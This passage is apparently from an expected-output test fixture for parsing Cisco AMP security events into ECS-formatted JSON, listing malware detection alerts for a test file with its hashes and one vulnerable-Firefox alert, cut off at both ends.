Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669671340605000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669671340605485", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:20:59.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469659269Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669667045638000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669667045638188", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894" + } + }, + "@timestamp": "2021-01-15T10:20:00.000Z", + "file": { + "name": "firefox.exe", + "hash": { + "sha256": 
"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Exploit_Prevention" + ], + "hash": [ + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Exploit_Prevention", + "hostname": "Demo_AMP_Exploit_Prevention" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:31:04.469661163Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla 
Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", + "kind": "alert", + "start": "2021-01-15T10:20:00.000Z", + "action": "Vulnerable Application Detected", + "id": "15210587194928", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f5:8f:96:c3:53:1c", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f5:8f:96:c3:53:1c" + ], + "cve": [ + "CVE-2015-7204" + ] + }, + "vulnerabilities": [ + { + "name": "Mozilla Firefox", + "score": "6.8", + "cve": "CVE-2015-7204", + "version": "41.0", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204" + } + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296279 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:19:59.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": 
"user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469663071Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669409347600000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": 
{ + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669409347600427", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:19:59.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469664950Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669409347600000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669409347600426", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:19:58.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469666839Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669405052633000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669405052633129", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:58.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469668742Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669147354595000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669147354595368", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:58.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469670637Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669147354595000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669147354595367", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:57.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469672538Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669143059628000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669143059628070", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:25.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
